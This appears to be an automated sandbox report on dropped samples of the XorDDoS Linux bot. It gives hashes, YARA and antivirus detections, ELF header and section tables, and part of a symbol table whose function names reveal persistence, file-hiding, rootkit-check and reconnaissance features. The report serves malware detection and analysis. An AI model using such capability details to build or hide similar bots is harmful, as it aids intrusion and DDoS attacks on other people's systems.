                                                                                                                                          Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):625878
                                                                                                                                          Entropy (8bit):6.244400951993568
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Ac:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/915
                                                                                                                                          MD5:E93EE3F4DED35CEEAB60752300A344D0
                                                                                                                                          SHA1:0325929E1F69C50AB5B9F7F0CE1E8EA22D73AE25
                                                                                                                                          SHA-256:4C4F0DB79F9428A4CED61220F49A21C043A380CCB8E9B22AA6A82751B74D7D50
                                                                                                                                          SHA-512:4C1ED9CEC00047D315BE5C2631F64DE2BE3ED22CAEB5B4713A7C78F31EB33B023CA57C4A186F57F73A93608B43D3ACB3AECFBBC69E3FF103351ED258AF4303D6
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/trcmbxxcta, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/trcmbxxcta, Author: ditekSHen
                                                                                                                                          • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/trcmbxxcta, Author: Akamai CSIRT
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):625878
                                                                                                                                          Entropy (8bit):6.244412944744353
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Ay:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91z
                                                                                                                                          MD5:DAC7A7F61F77EB41E695AD36523C8FAA
                                                                                                                                          SHA1:5E124A29A6F138C7595C4743A7218C41EB361C44
                                                                                                                                          SHA-256:EC46314C3A253004752759ABBD850F155EB7E107AE01C55872443EC044C8DC9E
                                                                                                                                          SHA-512:EE38708B521CDED08E1B425C97A687D257E58E98B953EB66A6590C8BB35699F3E1140CBE8B5692F7A96241888B385C19F16392B895C31FF894A73DF6B5A99591
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/uhyqxsqece, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/uhyqxsqece, Author: ditekSHen
                                                                                                                                          • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/uhyqxsqece, Author: Akamai CSIRT
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):625878
                                                                                                                                          Entropy (8bit):6.2444013656132205
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Aj:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91y
                                                                                                                                          MD5:4F925977B7FA1D98EC538468E3547E28
                                                                                                                                          SHA1:8B11CBF131800A79A36862B5A60430D0C20B319D
                                                                                                                                          SHA-256:E899E4F08A544C495423BF3507DE66FB3352E13907B74F4815C3A5D42DC229B3
                                                                                                                                          SHA-512:061239BA69FE6A9D7D31406BE6FD5C973FC11E6EDB4FC50CA7BF0B91A5B7CAFA3D1F18982A67706902F2A6B896E6E2569D60C55F1541F63BFD98AF96829225F3
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/uijxdyxaco, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/uijxdyxaco, Author: ditekSHen
                                                                                                                                          • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/uijxdyxaco, Author: Akamai CSIRT
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):625878
                                                                                                                                          Entropy (8bit):6.244399011058191
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1At:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/914
                                                                                                                                          MD5:189FA45A47A27AEDF70F0E8468D9FACB
                                                                                                                                          SHA1:6558C2E8409337B90F32C6ECCBC07AF10C04D171
                                                                                                                                          SHA-256:55E4237B26194ECDB8EFF07D47323CC572CA679F83DE9A410A7F7EAB4E389701
                                                                                                                                          SHA-512:5D93F720259191FAAD875D1F8405328E6662F88BA2A1BA6BEE4BC7872AFD27AEE916BDA638B7B0AA3CE016469A6ADCBD8AD1A873C91198E7CD3268FCC4F1482D
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ypclxoxcxk, Author: Joe Security
                                                                                                                                          • Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ypclxoxcxk, Author: ditekSHen
                                                                                                                                          • Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/ypclxoxcxk, Author: Akamai CSIRT
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                          Process:/tmp/libudev.so
                                                                                                                                          File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):625867
                                                                                                                                          Entropy (8bit):6.244370981024914
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AG:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91h
                                                                                                                                          MD5:7DC92A289A05C45D4179A322344AD09C
                                                                                                                                          SHA1:BE912477F64A1EE9F2D8DDAEBCE6EFDFD00E7CCD
                                                                                                                                          SHA-256:8642022960D919321CCFCFB0A0CD631DB0E5DAC3E75014FC0C4CC6FF413C72C5
                                                                                                                                          SHA-512:717F42D45FB07173BFC47B1FCA26E85222EE676F2164A0F84D584EDA963F67BBDE8C68695E708B07EF6D5E2101510EE077EAE1653AE66A7C7C90397E869F29BF
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....
                                                                                                                                          File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
                                                                                                                                          Entropy (8bit):6.244370981024914
                                                                                                                                          TrID:
                                                                                                                                          • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                                                                                          • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                                                                                          File name:libudev.so
                                                                                                                                          File size:625867
                                                                                                                                          MD5:7dc92a289a05c45d4179a322344ad09c
                                                                                                                                          SHA1:be912477f64a1ee9f2d8ddaebce6efdfd00e7ccd
                                                                                                                                          SHA256:8642022960d919321ccfcfb0a0cd631db0e5dac3e75014fc0c4cc6ff413c72c5
                                                                                                                                          SHA512:717f42d45fb07173bfc47b1fca26e85222ee676f2164a0f84d584eda963f67bbde8c68695e708b07ef6d5e2101510ee077eae1653ae66a7c7c90397e869f29bf
                                                                                                                                          SSDEEP:12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AG:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91h
                                                                                                                                          TLSH:DDD47D06F243EAF7C4970570124BF7BF4230E6318412DF8AB6889D5AB9379F52A4E356
                                                                                                                                          File Content Preview:.ELF........................4....r......4. ...(......................a...a...............a...............r.......................... ... ................a..............@...........Q.td........................................GNU.................U......5...

                                                                                                                                          ELF header

                                                                                                                                          Class:ELF32
                                                                                                                                          Data:2's complement, little endian
                                                                                                                                          Version:1 (current)
                                                                                                                                          Machine:Intel 80386
                                                                                                                                          Version Number:0x1
                                                                                                                                          Type:EXEC (Executable file)
                                                                                                                                          OS/ABI:UNIX - System V
                                                                                                                                          ABI Version:0
                                                                                                                                          Entry Point Address:0x8048110
                                                                                                                                          Flags:0x0
                                                                                                                                          ELF Header Size:52
                                                                                                                                          Program Header Offset:52
                                                                                                                                          Program Header Size:32
                                                                                                                                          Number of Program Headers:5
                                                                                                                                          Section Header Offset:553480
                                                                                                                                          Section Header Size:40
                                                                                                                                          Number of Section Headers:28
                                                                                                                                          Header String Table Index:25
                                                                                                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                                                          NULL0x00x00x00x00x0000
                                                                                                                                          .note.ABI-tagNOTE0x80480d40xd40x200x00x2A004
                                                                                                                                          .initPROGBITS0x80480f40xf40x170x00x6AX004
                                                                                                                                          .textPROGBITS0x80481100x1100x697d80x00x6AX0016
                                                                                                                                          __libc_freeres_fnPROGBITS0x80b18f00x698f00x100f0x00x6AX0016
                                                                                                                                          __libc_thread_freeres_fnPROGBITS0x80b29000x6a9000x1db0x00x6AX0016
                                                                                                                                          .finiPROGBITS0x80b2adc0x6aadc0x1c0x00x6AX004
                                                                                                                                          .rodataPROGBITS0x80b2b000x6ab000x153c00x00x2A0032
                                                                                                                                          __libc_subfreeresPROGBITS0x80c7ec00x7fec00x300x00x2A004
                                                                                                                                          __libc_atexitPROGBITS0x80c7ef00x7fef00x40x00x2A004
                                                                                                                                          __libc_thread_subfreeresPROGBITS0x80c7ef40x7fef40x80x00x2A004
                                                                                                                                          .eh_framePROGBITS0x80c7efc0x7fefc0x60f40x00x2A004
                                                                                                                                          .gcc_except_tablePROGBITS0x80cdff00x85ff00x11b0x00x2A001
                                                                                                                                          .tdataPROGBITS0x80cf10c0x8610c0x140x00x403WAT004
                                                                                                                                          .tbssNOBITS0x80cf1200x861200x2c0x00x403WAT004
                                                                                                                                          .ctorsPROGBITS0x80cf1200x861200x80x00x3WA004
                                                                                                                                          .dtorsPROGBITS0x80cf1280x861280xc0x00x3WA004
                                                                                                                                          .jcrPROGBITS0x80cf1340x861340x40x00x3WA004
                                                                                                                                          .data.rel.roPROGBITS0x80cf1380x861380x2c0x00x3WA004
                                                                                                                                          .gotPROGBITS0x80cf1640x861640x80x40x3WA004
                                                                                                                                          .got.pltPROGBITS0x80cf16c0x8616c0xc0x40x3WA004
                                                                                                                                          .dataPROGBITS0x80cf1800x861800xb400x00x3WA0032
                                                                                                                                          .bssNOBITS0x80cfcc00x86cc00x67180x00x3WA0032
                                                                                                                                          __libc_freeres_ptrsNOBITS0x80d63d80x86cc00x140x00x3WA004
                                                                                                                                          .commentPROGBITS0x00x86cc00x4220x00x0001
                                                                                                                                          .shstrtabSTRTAB0x00x870e20x1260x00x0001
                                                                                                                                          .symtabSYMTAB0x00x876680x93c00x100x0279144
                                                                                                                                          .strtabSTRTAB0x00x90a280x82a30x00x0001
                                                                                                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                                                          LOAD0x00x80480000x80480000x8610b0x8610b6.19660x5R E0x1000.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
                                                                                                                                          LOAD0x8610c0x80cf10c0x80cf10c0xbb40x72e03.65720x6RW 0x1000.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
                                                                                                                                          NOTE0xd40x80480d40x80480d40x200x201.74870x4R 0x4.note.ABI-tag
                                                                                                                                          TLS0x8610c0x80cf10c0x80cf10c0x140x402.84140x4R 0x4.tdata .tbss
                                                                                                                                          GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                                                                                          NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                                                                                                          .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                                                          .symtab0x80480d40SECTION<unknown>DEFAULT1
                                                                                                                                          .symtab0x80480f40SECTION<unknown>DEFAULT2
                                                                                                                                          .symtab0x80481100SECTION<unknown>DEFAULT3
                                                                                                                                          .symtab0x80b18f00SECTION<unknown>DEFAULT4
                                                                                                                                          .symtab0x80b29000SECTION<unknown>DEFAULT5
                                                                                                                                          .symtab0x80b2adc0SECTION<unknown>DEFAULT6
                                                                                                                                          .symtab0x80b2b000SECTION<unknown>DEFAULT7
                                                                                                                                          .symtab0x80c7ec00SECTION<unknown>DEFAULT8
                                                                                                                                          .symtab0x80c7ef00SECTION<unknown>DEFAULT9
                                                                                                                                          .symtab0x80c7ef40SECTION<unknown>DEFAULT10
                                                                                                                                          .symtab0x80c7efc0SECTION<unknown>DEFAULT11
                                                                                                                                          .symtab0x80cdff00SECTION<unknown>DEFAULT12
                                                                                                                                          .symtab0x80cf10c0SECTION<unknown>DEFAULT13
                                                                                                                                          .symtab0x80cf1200SECTION<unknown>DEFAULT14
                                                                                                                                          .symtab0x80cf1200SECTION<unknown>DEFAULT15
                                                                                                                                          .symtab0x80cf1280SECTION<unknown>DEFAULT16
                                                                                                                                          .symtab0x80cf1340SECTION<unknown>DEFAULT17
                                                                                                                                          .symtab0x80cf1380SECTION<unknown>DEFAULT18
                                                                                                                                          .symtab0x80cf1640SECTION<unknown>DEFAULT19
                                                                                                                                          .symtab0x80cf16c0SECTION<unknown>DEFAULT20
                                                                                                                                          .symtab0x80cf1800SECTION<unknown>DEFAULT21
                                                                                                                                          .symtab0x80cfcc00SECTION<unknown>DEFAULT22
                                                                                                                                          .symtab0x80d63d80SECTION<unknown>DEFAULT23
                                                                                                                                          .symtab0x00SECTION<unknown>DEFAULT24
                                                                                                                                          .L108.symtab0x80ad9500NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L113.symtab0x80ad9900NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L114.symtab0x80ad9f80NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L115.symtab0x80ada300NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L116.symtab0x80ada4e0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L117.symtab0x80ada6c0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L118.symtab0x80ada890NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L119.symtab0x80adabd0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L12.symtab0x80b130b0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L120.symtab0x80adadc0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L121.symtab0x80adafb0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L122.symtab0x80ad8e30NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L123.symtab0x80adb2b0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L124.symtab0x80add7f0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L125.symtab0x80addb40NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L126.symtab0x80add020NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L127.symtab0x80add1f0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L128.symtab0x80add460NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L129.symtab0x80add630NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L130.symtab0x80adb8c0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L131.symtab0x80adbd30NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L132.symtab0x80adc000NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L133.symtab0x80adc370NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L134.symtab0x80adc500NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L135.symtab0x80adc7d0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L136.symtab0x80adcb50NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L137.symtab0x80adcc90NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L14.symtab0x80b14190NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L15.symtab0x80b14080NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L16.symtab0x80b13f80NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L17.symtab0x80b13e80NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L18.symtab0x80b138c0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L19.symtab0x80b137e0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L20.symtab0x80b13450NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L21.symtab0x80b13710NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L258.symtab0x80ae76c0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L259.symtab0x80ae4a00NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L260.symtab0x80ae5f70NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L261.symtab0x80ae7c00NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L262.symtab0x80ae5e90NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L264.symtab0x80ae43d0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L266.symtab0x80ae4960NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L267.symtab0x80ae68f0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L268.symtab0x80ae6a00NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L269.symtab0x80ae6050NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L270.symtab0x80ae6280NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L271.symtab0x80ae6420NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L272.symtab0x80ae6640NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L273.symtab0x80ae4ab0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L274.symtab0x80ae4e40NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L275.symtab0x80ae5990NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L276.symtab0x80ae55f0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L277.symtab0x80ae5da0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L278.symtab0x80ae8350NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L279.symtab0x80ae7ce0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L280.symtab0x80ae7e00NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L281.symtab0x80ae6b70NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L282.symtab0x80ae70c0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L283.symtab0x80ae4670NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L350.symtab0x80ae8400NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L351.symtab0x80ae84a0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L352.symtab0x80ae8590NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L353.symtab0x80ae8630NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L354.symtab0x80ae8720NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L355.symtab0x80ae87d0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L356.symtab0x80ae8870NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L357.symtab0x80ae8920NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L358.symtab0x80ae89e0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L359.symtab0x80ae8aa0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L360.symtab0x80ae8b30NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L361.symtab0x80ae8bd0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L362.symtab0x80ae8cc0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L363.symtab0x80ae8db0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L364.symtab0x80ae8ea0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L365.symtab0x80ae8f90NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L366.symtab0x80ae9080NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L380.symtab0x80ae4380NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L411.symtab0x80aeb100NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L412.symtab0x80aeae60NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L413.symtab0x80aeb540NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L414.symtab0x80aebc00NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L415.symtab0x80aec200NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L416.symtab0x80aec600NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L61.symtab0x80ad6730NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L63.symtab0x80ad6ef0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L64.symtab0x80ad6ce0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L67.symtab0x80ad6de0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L68.symtab0x80ad6d60NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L69.symtab0x80ad6a20NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L70.symtab0x80ad6c20NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L74.symtab0x80afb630NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L76.symtab0x80afbdf0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L77.symtab0x80afbbe0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L80.symtab0x80afbce0NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L81.symtab0x80afbc60NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L82.symtab0x80afb920NOTYPE<unknown>DEFAULT3
                                                                                                                                          .L83.symtab0x80afbb20NOTYPE<unknown>DEFAULT3
                                                                                                                                          AddService.symtab0x8048865807FUNC<unknown>DEFAULT3
                                                                                                                                          CalcCrc32.symtab0x80492b470FUNC<unknown>DEFAULT3
                                                                                                                                          CalcFileCrc.symtab0x8049346172FUNC<unknown>DEFAULT3
                                                                                                                                          CalcFindIpCrc.symtab0x804932038FUNC<unknown>DEFAULT3
                                                                                                                                          CalcHeaderCrc.symtab0x80492fa38FUNC<unknown>DEFAULT3
                                                                                                                                          CheckLKM.symtab0x804a670107FUNC<unknown>DEFAULT3
                                                                                                                                          CreateDir.symtab0x80483de375FUNC<unknown>DEFAULT3
                                                                                                                                          DNS_ADDR.symtab0x80cf4cc16OBJECT<unknown>DEFAULT21
                                                                                                                                          DNS_ADDR2.symtab0x80cf4dc16OBJECT<unknown>DEFAULT21
                                                                                                                                          DNS_PORT.symtab0x80cf4ec4OBJECT<unknown>DEFAULT21
                                                                                                                                          DelService.symtab0x8048cdc275FUNC<unknown>DEFAULT3
                                                                                                                                          DelService_form_pid.symtab0x8048def113FUNC<unknown>DEFAULT3
                                                                                                                                          GetCpuInfo.symtab0x804e2ce539FUNC<unknown>DEFAULT3
                                                                                                                                          GetIndex.symtab0x804b418189FUNC<unknown>DEFAULT3
                                                                                                                                          GetLanSpeed.symtab0x804e5e1243FUNC<unknown>DEFAULT3
                                                                                                                                          GetMemStat.symtab0x804e1d9245FUNC<unknown>DEFAULT3
                                                                                                                                          Get_AllIP.symtab0x804ef5d375FUNC<unknown>DEFAULT3
                                                                                                                                          HideFile.symtab0x804a74d151FUNC<unknown>DEFAULT3
